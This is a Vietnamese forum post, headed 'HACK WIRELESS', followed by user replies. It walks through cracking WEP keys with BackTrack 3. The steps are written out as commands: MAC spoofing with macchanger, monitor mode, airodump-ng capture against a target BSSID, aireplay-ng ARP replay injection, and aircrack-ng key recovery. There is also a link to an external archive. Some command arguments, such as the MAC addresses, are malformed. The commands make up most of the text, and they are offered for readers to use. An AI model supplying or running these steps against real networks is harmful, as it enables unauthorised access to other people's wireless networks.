down back track 3.0:[CODE]http://www.remote-exploit.org/backtrack_download.html [/CODE]
các bác chú ý chọn đúng bản back track 3 nhé cái cuối cùng ấy,bản 4 có rồi nhưng chưa có hướng dẫn sử dụng
--------------------------HACK WIRELESS-----------------------------------------
CRACK WEP KEY 64 BITS

THIẾT BỊ THỰC HÀNH:

Một access point được cấu hình bảo mật WEP pre_shared key 64 bits và một PC có card wireless có tính năng Sniffer.
Một đĩa CD backtrack 3.0.

CÁC BƯỚC THỰC HIỆN:
Sau khi boot PC từ đĩa CD backtrack thành công và tiến hành các bước sau:

·Bước1: Start chương trình airmon-ng để đổi địa chỉ MAC address của card wireless bằng các câu lệnh
Airmon-ng stop ath0
Ifconfig wifi0 down
Macchanger --mac 00 11 22 33 44 55 wifi0
Xem hình minh hoạ:



·Bước 2: chuyển card wireless về chế độ monitor bằng lệnh:
Airmon-ng start wifi0



·Bước 3: Dò và xác định các thông số của AP target bằng chương trình airodump-ng
Airodump-ng ath0
kết qủa dò tìm như hình sau. Ta chú ý các thông số BSSID, kênh, kiểu mã hoá.


·Bước 4: Dùng airodump-ng để capture gói tin dựa vào các thông số trên bằng lệnh:
airodump-ng -c 1 –w/root/desktop/capture/wep64 –bssid 00bf:05:d6:0c ath0
-c 1 : kênh phát của AP target là kênh 1
/root/desktop/capture/wep64: đường dẫn lưu file capture
00bf:05:d6:0c : MAC address của AP target



·Bước 5: Dùng chương trình aireplay-ng để tim gói đến AP nhằm tăng lưu lượng gói để capture nhanh hơn.
Aireplay-ng -3 -b 00bf:05:d6:0c –h 002255 ath0
Quá trình tim gói như hình sau:


·Trở lại màn hình airodump để quan sát quá trình bắt gói. Trong bài lap này, với số gói là 10333 (mất khoảng 15s ) thì có thể tìm được khoá



·Dùng chương trình aircrack-ng để tìm ra khoá.
Aircrack-ng –n 64 --bssid 00bf:05:d6:0c /root/desktop/capture/wep64-01.cap
Quan sát quá trình phân tích và tìm khoá như hình sau:


CRACK WEP KEY 128 BITS:

Quá trình crack wep 128 bits bao gồm các bước thực hiện hoàn toàn tương tự như việc crack wep 64 bits. Chỉ khác là ta cần capture nhiều gói tin hơn. Để crack được wep 128 bits, ta cần tối thiểu khoảng 1100000 packets (mất khoảng 40 phút và cần khoảng 5000 ivs).



www.ziddu.com/download/11661360/CrackWEP-ARPReplay.rar.html

Để mình thử xem. Thấy hấp dẫn quá. Tronh 40p hack đó mình vẫn dùng internet dây bình thường dc chứ bạn hả?

đang thực hành theo hướng dẫn của bạn nhưng chưa thành công. huhu

 

bạn ơi sao mình làm không được nhỉ, bạn có thể hướng dẫn bằng hình ảnh được không?

Bạn nào làm được rồi hướng dẫn lại bằng hình ảnh được không?